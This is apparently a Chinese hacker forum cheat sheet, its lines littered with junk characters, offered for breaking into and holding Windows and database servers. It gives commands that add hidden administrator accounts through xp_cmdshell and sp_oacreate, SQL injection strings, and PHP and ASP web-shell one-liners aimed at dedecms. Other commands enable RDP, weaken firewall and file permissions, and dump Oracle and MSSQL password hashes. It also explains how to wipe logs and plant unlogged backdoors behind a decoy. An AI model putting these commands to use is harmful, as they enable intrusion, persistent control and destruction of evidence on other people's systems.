) y d; t; d. g; I' ^2 g. N
1.net user administrator /passwordreq:no( ?: K5 @( D$ `. \! C2 I" I5 N
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
6 K9 b4 N, i! ]4 a2.比较巧妙的建克隆号的步骤
+ ]; h- Q+ E+ B4 v: q- }% a1 R+ q先建一个user的用户
9 G3 a3 x2 e9 Q1 G0 H @然后导出注册表。然后在计算机管理里删掉9 m8 q U& D9 n! _3 {+ k
在导入,在添加为管理员组
8 `" G0 q2 W/ L3.查radmin密码
# O1 ^: p( @: lreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
& U- a* n4 L B8 C4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
1 g/ @) ~% H R6 R7 d, Q建立一个"services.exe"的项
' Y# j: ^* ]9 E' O/ O再在其下面建立(字符串值)* \& ^' P. D' ^/ b& D
键值为mu ma的全路径5 w% @- [( o$ k% T# O; p- s: H
5.runas /user:guest cmd* E/ S; N. g4 s; _# Q3 U9 ]
测试用户权限!
' t# @) _( N& x3 }/ ?+ {8 e" c6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
& n& k, v) t, S4 l7.入侵后漏洞修补、痕迹清理,后门置放:
5 R: A3 D0 K, c( \# s! |6 x# V基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
4 Y' A& C9 E. ~; q8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c- Z# k3 O# ?4 d8 ^* Y' q1 \
$ [6 X6 M( k [for example
" \8 J6 N3 Q8 l" J% V7 k0 K1 k, u: A8 ?" [! w" Q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'. t" ^" @, |3 G/ u( j+ w
+ y- r5 |6 B* I9 o! J: B
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'/ E9 q- V& v" S2 ~# j
# B8 C5 O1 Z1 d' Z8 b" B, G
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了( H! N' X N* U% }+ r
如果要启用的话就必须把他加到高级用户模式
$ Y D; e+ e; l4 C+ N可以直接在注入点那里直接注入- ` s, P3 O" _& e8 g' G
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--* A5 I- C7 A3 }: v$ |
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
5 `6 b! W- |/ k( E2 Y1 ]9 W3 \或者
) a: |3 k( a ^& h usp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
# S$ H% |8 a8 b- Q, o来恢复cmdshell。
* J/ H5 s3 y8 Y* k
( L9 p8 ^( |" b* @9 |; Z分析器
/ G, S; `( b$ ]- _4 M. @9 A5 YEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
! ~( g6 t. _8 @" B然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")6 i+ v& w5 z/ O3 S
10.xp_cmdshell新的恢复办法: u' z2 f3 S6 @
xp_cmdshell新的恢复办法
( S J; e- l# L# d+ _扩展储存过程被删除以后可以有很简单的办法恢复:5 a' R: O ^, [0 u/ N- A
删除0 g& m: e. l1 h2 ?
drop procedure sp_addextendedproc
3 @# X: {: w, g$ t+ W3 y) ?drop procedure sp_oacreate* B0 L& X; l9 n/ v4 r" N. ~- V/ L
exec sp_dropextendedproc 'xp_cmdshell'
3 N {+ m. X* z; Q. v2 `# u
( b. U8 A8 ~% ~+ @$ ]5 v& @+ B2 [6 S恢复( I1 r* Q. ~1 {' ?( o8 Q, Q: _6 q- {
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
$ R4 m+ I# g$ t7 _# W- z0 B- u+ kdbcc addextendedproc ("xp_cmdshell","xplog70.dll")
) X1 o9 k; L1 P1 l
* O( A& ]" \8 ]2 T% b这样可以直接恢复,不用去管sp_addextendedproc是不是存在4 d Q" Y3 B) N" G* m; |
( ?: b; j. _* T-----------------------------
/ G) w/ F& n! I8 Q- @* q
% Y* }/ E$ S# e; e2 [9 M删除扩展存储过过程xp_cmdshell的语句:# `+ p( X, Q% F
exec sp_dropextendedproc 'xp_cmdshell'
% Y. J9 h" e+ T9 j
) J5 m7 [$ L! F% G9 s恢复cmdshell的sql语句: E3 u8 ?1 M0 N
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll', t+ v' o/ M V, e5 U
4 C; B$ w* V+ A
. _* N$ I* C% W3 `开启cmdshell的sql语句+ t! E. v! J3 U4 \& ]
3 w% f e+ j1 ]9 |: w, J
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'. i- B7 N, Q% T# p' z8 B
1 |7 z# x9 a: t9 O4 o% v
判断存储扩展是否存在
2 }" e1 u2 c" H$ U6 kselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'* U/ N" j3 O! D
返回结果为1就ok @7 r4 \ T6 ?1 ]# \
1 ]2 r: X4 c. f0 I o) h
恢复xp_cmdshell
" m; E: @: r; U& o `4 W& J9 t% iexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
F# u. T+ y1 f4 n+ Z返回结果为1就ok
0 X; f5 A8 E. H2 X3 X
/ L; Y* M3 {7 W6 `3 A否则上传xplog7.0.dll
) S* u: ]- A2 s7 I7 X% Wexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'$ i9 G6 ?' s% ~4 E p. S+ Q
4 T5 q9 L. ^$ v堵上cmdshell的sql语句
) [$ \2 N! K3 s5 B! Z( ssp_dropextendedproc "xp_cmdshel
+ _1 c( t' Y! g- q( S$ Y2 \/ i-------------------------4 V/ n4 Z" N; d! c' V
清除3389的登录记录用一条系统自带的命令:2 A/ j c! D0 m( y8 l0 ^1 |6 K5 U
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
$ p" p& H' B) l$ B. I- @7 ~! e! Q
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
1 K# Y) b2 S O8 w8 ~在 mysql里查看当前用户的权限6 z/ f' W% s2 C1 F: X) n
show grants for 4 r; e) p* P, e' y& u
3 Y) t0 l+ i( I
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
" z" {; D- u1 u* C/ g" y1 {9 ~
: E6 {2 B8 H( W1 V: c% S4 L0 [) p/ \0 B4 `1 M* m
Create USER 'itpro'@'%' IDENTIFIED BY '123';, ~% `# g5 G8 _$ T* z! D* R0 E
7 o5 X0 z& J6 Y# J3 J" wGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
: j6 B! E' B- K! G! ?* V1 x" a4 V9 J Y& V; x1 B
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0' g1 k- G! s# a7 m5 C
! }3 G3 m& L: `) i7 r4 n
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;9 @- }; x% m% H' P y
; ]: _& y' H9 \) X0 D) b搞完事记得删除脚印哟。
: v/ u% g1 Z; P) c$ ~! I/ w: h/ U- [7 d: _, q
Drop USER 'itpro'@'%';
" h, `/ u0 }+ q) X( H, z2 d. `+ h# P( n! V' t3 W
Drop DATABASE IF EXISTS `itpro` ;
X, |; q) ?* {/ R3 U) {! s
) I! Z0 M/ w2 L1 i* Z% k4 Z* \3 U1 t+ I% D当前用户获取system权限
( u3 s; V% ~. ]/ N% s" f/ U3 n+ \sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
2 s: ]0 d2 G% W6 a' csc start SuperCMD! d) g ~* f7 N8 d
程序代码5 {1 F: s1 q+ [1 K
<SCRIPT LANGUAGE="VBScript">% }0 ?$ |! g7 b. m
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
7 p$ a- B$ J6 \- Sos="WinNT://"&wsnetwork.ComputerName/ X# n# H# O( {: l7 G4 t
Set ob=GetObject(os)2 t: H6 S" U, t1 P6 S
Set oe=GetObject(os&"/Administrators,group")
8 D& @5 _8 ?# y% s% ]- HSet od=ob.Create("user","nosec")
# E+ E4 k& ~% X! p0 r q0 w8 M% fod.SetPassword "123456abc!@#"" U6 }0 B4 D8 V/ r: {
od.SetInfo3 _# j' z, f; f+ q& J
Set of=GetObject(os&"/nosec",user)1 a) `# e5 u! `3 ?; Q
oe.add os&"/nosec"
1 q0 C, |- v6 P4 A* }* N</Script>
: v4 n+ a" ]8 x/ s8 E4 `<script language=javascript>window.close();</script>
1 \8 U: [2 `: c5 ? |# A1 g0 Q$ ?4 S* T1 \; p
1 w2 I% U3 w$ S# z( n+ c+ a6 Z
/ v0 r7 B, C. }
4 S' K1 b2 P* R0 D( ?. A n0 ]0 t
突破验证码限制入后台拿shell
8 A6 m# q4 c& L6 p程序代码. @9 R! \- F; j7 C& I( S
REGEDIT4 ) G* W. y# I6 Z4 ^: Z2 Y0 W
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
4 Z( d( ^( p! Q) v8 H8 y$ K"BlockXBM"=dword:000000003 e3 h; s- f( u. l- ~
% z5 h, x# w3 h
保存为code.reg,导入注册表,重器IE
% H+ h- Z) Z9 s就可以了
5 N3 I/ q( m2 @5 w- X* Eunion写马
! q& `% h2 s: S程序代码
8 L, `1 t8 T) xwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*) M. \5 {* i& S; V- q) ~ l
; K* Y; F/ z9 b
应用在dedecms注射漏洞上,无后台写马
2 R$ ~: G* \8 C$ X) F$ D2 G0 e: ldedecms后台,无文件管理器,没有outfile权限的时候: o9 d2 g Z9 A$ C
在插件管理-病毒扫描里
& W* r& ?9 [, G* I/ |写一句话进include/config_hand.php里
% S8 b0 G$ e2 d1 e程序代码
6 Z- R* k w. K B w- ^. t% b>';?><?php @eval($_POST[cmd]);?> y9 K, v6 l$ g9 z8 f H% P
8 B( @ p9 @" H- K4 v N
4 f1 M/ e0 R8 d# R6 Z如上格式
. {- Q4 @: X, _( K, D/ z- U* w3 Y1 v3 t9 E- i) [9 G
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
; M1 H- x) u3 p8 y. I/ s程序代码" c# N; t, W! y# A" t0 H
select username,password from dba_users;& b8 o( X" W5 T4 E3 j
) \1 C$ [) A' Q6 O3 S4 V3 {9 F
. M. X, X! \, l+ c. x% D
mysql远程连接用户* j, }% B) k& a8 A& U! X
程序代码
) q! c# {1 f7 @8 O8 }; f1 H7 m* s$ N: l# t9 g1 D$ w1 a! `
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';. S' c: ~* _- [$ n( l9 a
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
, N# g* h) a9 a4 Q7 SMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0- r( v2 \1 Y+ W
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;# Y# w3 R4 o) `" A I, D- g! N
* E2 g& E3 ~/ i7 D' p9 N* J1 O9 j0 ]( T$ j
( c k. J8 f; C. w% _4 d- n
) J, W+ x/ l2 `& P+ P
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
: q# I. c2 J: u& C e" \ e3 a2 ]7 O1 [; q2 \$ m. n+ C
1.查询终端端口; |; b Q4 f6 {" ]+ m" ^
4 ~& s4 G& w6 ~9 C$ P$ ^6 v
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
; @; X4 v2 Q8 `$ M# K$ y; c7 \6 r" k5 M
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp". L" W; c$ J% t8 H8 v
type tsp.reg
7 _3 n; k, c* M
# [' l+ i! E" j- R: x2.开启XP&2003终端服务" v" I0 C9 n( x) p
; {! P( K9 v% {7 G0 H$ O
! r' c7 ^3 W) n7 i( }REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
. Y# J- U, l2 f, q: I3 s3 A
+ e$ _. L" x" b6 @$ _
0 \3 L i0 {4 a+ m1 MREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
* c# d" Q1 [, `- V3 ^( ~* L8 B
$ J% w' d! N+ N2 i3.更改终端端口为20008(0x4E28)3 J* _( |* J+ S9 [3 r8 f6 V/ M; [, D: Y
' B1 b$ q8 E I6 GREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f5 l* f. | g% @' [" r0 p8 }: n: [
a$ v) u9 O3 T" h- Y7 bREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
6 G6 B3 q$ b V' i/ L& b G
) E5 r, q! T! v* ^ F" S4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制% W: v0 H& P r7 T, |
3 g& s/ U! m0 m* x4 |) O% F
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f' s, V: D1 d7 }: Q
1 v; x2 x* e8 @3 {
- V0 ]. ?% F' d4 f0 C5.开启Win2000的终端,端口为3389(需重启)
: w$ r) Z# ?9 {* }% y/ e* c/ D9 N* Q) c! d' W. D1 o
echo Windows Registry Editor Version 5.00 >2000.reg
" }4 ?' A9 \( R; K0 n* G, V0 Y7 Recho. >>2000.reg; g6 |/ V2 D5 b
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg ( K5 Z2 i# D+ _& f- e0 v
echo "Enabled"="0" >>2000.reg 7 d. f' L t! O5 Q4 d! u. E
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
( n$ c! S7 K, Q+ Q7 n( q8 `& \6 decho "ShutdownWithoutLogon"="0" >>2000.reg
; m" p# T' j% N+ L) r4 |0 D0 [; vecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
( b9 l& ~4 b& Z8 F- o0 Pecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
2 Y! N# H' S% s" Y& ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
( m/ U. q. [3 X+ B9 fecho "TSEnabled"=dword:00000001 >>2000.reg
p; B6 i, r. [& k4 r' U; Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
$ X; E+ s/ ?% l/ x5 i7 lecho "Start"=dword:00000002 >>2000.reg
8 x& P+ d& H! necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
5 M) [' Q3 A S; y+ R; ?echo "Start"=dword:00000002 >>2000.reg
W9 ~3 X$ W: s% Techo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg ' w9 q e- E: \* I+ \- K" g
echo "Hotkey"="1" >>2000.reg
1 s6 G! S+ ?5 v! eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
8 C/ x' w" Z& G! ?' }' X' L' _echo "ortNumber"=dword:00000D3D >>2000.reg c" ]8 `8 s/ u% L% y4 W
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
* U' a2 k7 i0 C8 `9 o6 R2 Hecho "ortNumber"=dword:00000D3D >>2000.reg
6 _6 S& r5 _! l+ Z) V
1 }% h% ?: h% H2 ~6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)4 u1 M" k* R1 y' H
" G7 i" {# J1 P# E+ M5 c$ V@ECHO OFF & cd/d %temp% & echo [version] > restart.inf2 k2 K0 f6 p" i7 S( a0 w7 ?7 h* ?
(set inf=InstallHinfSection DefaultInstall)
" w1 g2 c" N( e' pecho signature=$chicago$ >> restart.inf
/ l' D6 W! C& `* }6 e$ _echo [defaultinstall] >> restart.inf
4 r# m+ d4 r: ^, u) urundll32 setupapi,%inf% 1 %temp%\restart.inf, E, L2 W5 Z+ d& W( j! Y
7 ^! {' x% \* e: h$ f# q3 j
& T; x5 X- c& N5 ~: P M7.禁用TCP/IP端口筛选 (需重启)
% V/ M! E8 W) a% M+ O2 S8 Z
) v' v- q# }5 F0 PREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
$ ~/ `- H* F; Q* {6 H2 u, ?( a7 `. d2 Y' D9 K; q& n, j( p
8.终端超出最大连接数时可用下面的命令来连接
2 V. _ {: o* [
2 T' r# Y9 O2 Bmstsc /v:ip:3389 /console
0 Q) `( g3 d8 j. h0 ?2 C3 m) ^" s7 [8 O: q6 R* J @* U
9.调整NTFS分区权限
7 ?3 B( D9 \; f) T$ E' f2 `5 W4 w1 Q# }5 s
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
' s6 m# L( W7 Q( L h6 o& f/ N) p/ C( E2 z2 ~2 ?4 [9 N$ a
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件), }/ Q" Z+ |) v/ e, \' R o/ b. w
! |, Q; V5 K9 P- e" Z
------------------------------------------------------" J- N9 o! {6 K% |% c/ q
3389.vbs
" ~3 K( u; I q$ m& pOn Error Resume Next4 k4 n3 e( a3 Z& A# y7 x$ U5 `
const HKEY_LOCAL_MACHINE = &H800000021 L4 [8 N9 W0 O; U4 a3 H
strComputer = "."1 T. B! a$ r: I
Set StdOut = WScript.StdOut
( u) }0 s; k. `2 WSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
' M2 ^- |# h, V" D3 EstrComputer & "\root\default:StdRegProv")
9 `5 L" U4 o. y' b7 u+ \$ |7 XstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
# t! G( H2 ?2 \& o/ p5 W3 P) @7 woreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
K, ^- Q: G3 g/ t1 Q4 JstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp", a$ B# j1 r) _2 X" A* R( f" R
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath( P3 @* G2 K- \- A3 u' w$ z
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"1 Y! x: D1 _) z6 z
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"0 y, f) {/ i% ?8 _- |
strValueName = "fDenyTSConnections"& k% L# z' d0 t6 O. @) U- o
dwValue = 0
5 L1 b+ K- ^4 _4 P9 I% x+ T! Soreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue( y# z" O9 J) N
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"5 Z7 g9 _) t' Y! d) L
strValueName = "ortNumber"" F7 Z. s$ l6 Z5 G" ^
dwValue = 3389
9 [4 p- K5 w; M; E% \" D8 l5 Loreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
x, r2 Y% X b. P) O- ^2 A+ DstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
, N1 i8 E7 r" F- I( ?strValueName = "ortNumber"0 E; B" t$ D9 F) y
dwValue = 33899 V* d/ `/ N: y$ r% d- u; y
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
e3 a4 h/ d, k" z( V6 jSet R = CreateObject("WScript.Shell") 6 \% `; @# R5 }$ o
R.run("Shutdown.exe -f -r -t 0")
& g M n0 @2 s. u
! Z/ ?# ?. U8 L6 A/ l& f( z8 Z删除awgina.dll的注册表键值
8 n' t' m1 P) ]- w/ d* Y3 Q程序代码
& G' @( T% x4 m7 V7 t; q8 t2 n
1 Q: E1 K: Y& F$ U: greg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
6 j7 h7 Y7 a4 ]% c$ `
2 k: v, X/ b( ^$ `! {
$ C* D$ n. R* a: L
; y+ m5 R X4 E1 s1 U+ i
( I$ q* \1 s8 e( {4 k. C* k0 T程序代码( L7 f& J" f; [
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash$ q7 U& m( K& b2 i7 A g8 j
6 ~# t& l' T6 M: w# k! _
设置为1,关闭LM Hash
) _9 F B7 z p9 M9 E- K9 f
" V S" m! o; c, M) S+ z( s' T数据库安全:入侵Oracle数据库常用操作命令8 @% `( X% e0 L! A# a# G. _# x" m/ O
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
^& S7 J8 F$ L. a( p8 E- g2 h, U! f1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
[4 d1 C( e! {( u& j5 x" m, A2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
% ~" w: E4 }% K5 r5 \4 S3、SQL>connect / as sysdba ;(as sysoper)或
# Z) H: t$ b& p' s4 m5 Uconnect internal/oracle AS SYSDBA ;(scott/tiger)0 i$ w+ _! W3 n7 P z
conn sys/change_on_install as sysdba;
2 I7 P9 S" t1 f2 a P% M4、SQL>startup; 启动数据库实例
# b* r% {" w/ [, q% J2 Y5、查看当前的所有数据库: select * from v$database;
8 a! b8 `* ?1 ?& x- a4 C- }select name from v$database;9 `2 K; ?2 k; o
6、desc v$databases; 查看数据库结构字段$ B9 A) X/ e: N: p) k, b+ g
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
/ q& ^; E! L) k1 G4 NSQL>select * from V_$PWFILE_USERS;9 ~ V5 d% L" v3 z; O! |5 l# {& M
Show user;查看当前数据库连接用户
* |0 f- H9 |2 j( b! h8、进入test数据库:database test;
! W# Y4 u; _* c2 \9、查看所有的数据库实例:select * from v$instance;
: [& d; J& u& f! I; Y7 r9 u; n如:ora9i. |) g- D5 t7 _
10、查看当前库的所有数据表:- _& z: e0 h4 z6 R
SQL> select TABLE_NAME from all_tables;
0 i& l j$ h8 y7 Q8 `: |( qselect * from all_tables;
6 @( _7 Y6 l) H' M+ z8 Z. jSQL> select table_name from all_tables where table_name like '%u%';) d* E; X2 J1 g7 T# K9 O. ]) k
TABLE_NAME
: u- X, @6 y) O/ Y' F------------------------------3 r2 O! S0 X/ [6 _& g) e
_default_auditing_options_/ S* S" O+ T U2 A
11、查看表结构:desc all_tables;1 g5 v# n! q: I6 k
12、显示CQI.T_BBS_XUSER的所有字段结构:( I& I4 d/ d1 \* X/ D& s
desc CQI.T_BBS_XUSER;
6 {( [9 ~+ _7 d( F8 Y1 e13、获得CQI.T_BBS_XUSER表中的记录:+ a( t* b* T( z7 M0 R6 g/ D
select * from CQI.T_BBS_XUSER;
9 E `5 M! n4 y/ b' G14、增加数据库用户:(test11/test) c* X( R( N0 r& W0 [5 p+ g ~
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
' W. d% t% ]: v' f15、用户授权:% @1 v% r+ f$ d) s# s
grant connect,resource,dba to test11;. }8 m4 Q+ S% k/ l: Y' f
grant sysdba to test11;$ L2 [+ L) g% h) y) t7 d
commit;% n: e: W' r2 c) O" _4 K' z, H
16、更改数据库用户的密码:(将sys与system的密码改为test.)
# y( {) W5 J; ?& u3 C# K8 ]* Halter user sys indentified by test;5 ~8 b! h2 N+ u# K% s& X. {
alter user system indentified by test;. z [" \% Z7 b
( E3 o S6 I4 y( n- X3 B( kapplicationContext-util.xml
, y) h+ u) s0 y1 ?applicationContext.xml
0 e* {0 p4 ~2 w5 mstruts-config.xml6 }9 h9 D1 z5 w% q) } \7 Y
web.xml
& Q0 E0 z3 x* w7 Bserver.xml
9 H1 S; ?# {6 ntomcat-users.xml- q: A g/ Z2 W3 }3 b
hibernate.cfg.xml
' ^1 M6 J) Z/ w; Gdatabase_pool_config.xml
0 A+ M* |- d- N% n7 H6 b/ |( H) F; `* {+ ]9 i1 }7 L1 X5 S, ~' L6 j
' I8 [/ @3 N6 m\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
6 O! x( i: j7 X% Z% t& x. `. t\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini9 T g: h- v# S i! t
\WEB-INF\struts-config.xml 文件目录结构 D( l$ e: ]4 f9 H# }+ {4 x6 b
. w. d3 W: B5 \1 V+ ]& h" Dspring.properties 里边包含hibernate.cfg.xml的名称# o) b! Q* U$ H5 D+ u6 G, q; T
8 p8 R4 c3 z4 u, r4 I3 [- H% N
+ |; M# K" b4 i H& N( Z
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
. s+ @4 |6 V/ q+ Z. q& `4 I$ j) Y$ `4 I# ^
如果都找不到 那就看看class文件吧。。- ?& I1 x2 T+ O7 q& @" `
; e: T0 ?8 D% o8 A) V) E测试1:
5 X* w" e; c$ Q* q$ t+ E7 ^SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
- Y, y+ V, `) C$ {4 c3 }$ o
- N; W( J* O. t y1 E2 B8 W& p测试2:" z$ U* g' ]; M% H
+ B5 m# [5 [8 {- n% Jcreate table dirs(paths varchar(100),paths1 varchar(100), id int); v7 q* v7 L& c
( Z/ {) @* A! [" A8 H Tdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
F6 j: [0 c* t( L1 H9 ~' e6 i, J: S) F( r9 B4 z, ~% u
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
# o! ]6 W) }& ^6 G$ d3 X7 c
! j2 Q6 a0 n) \# A, s9 M3 Y查看虚拟机中的共享文件:# h+ G2 B" w5 \
在虚拟机中的cmd中执行% M9 v0 G. b, ^; }
\\.host\Shared Folders2 @. X9 I- C8 }/ U1 V+ i
% x( i4 J7 N( @/ A9 m7 U( P
cmdshell下找终端的技巧) y- C a: @! e) w" ]$ A/ V
找终端:
* S; q+ y n5 `( ]) J第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 5 C1 t. y x- Y9 V
而终端所对应的服务名为:TermService % R: q% w& N( b0 [6 l5 Y: |+ {0 P
第二步:用netstat -ano命令,列出所有端口对应的PID值!
+ @$ W' F3 [: F6 O* ^ m 找到PID值所对应的端口2 f9 C- U. k7 X4 R- V% l
0 O! d+ a5 a, y% s( a7 Z- B1 _' O ~查询sql server 2005中的密码hash! a$ A5 Z' G& u8 E
SELECT password_hash FROM sys.sql_logins where name='sa'0 ]! u4 O0 F& r# t7 a8 c
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
( i4 C; O9 g: P9 `access中导出shell) L+ n: @4 m) ~% s9 Q9 v
- O1 V) y! ^# d. f7 h1 h
中文版本操作系统中针对mysql添加用户完整代码:) i- E1 u' t$ X/ S5 |+ N" b( K
( }. [7 f/ |2 {( u
use test;
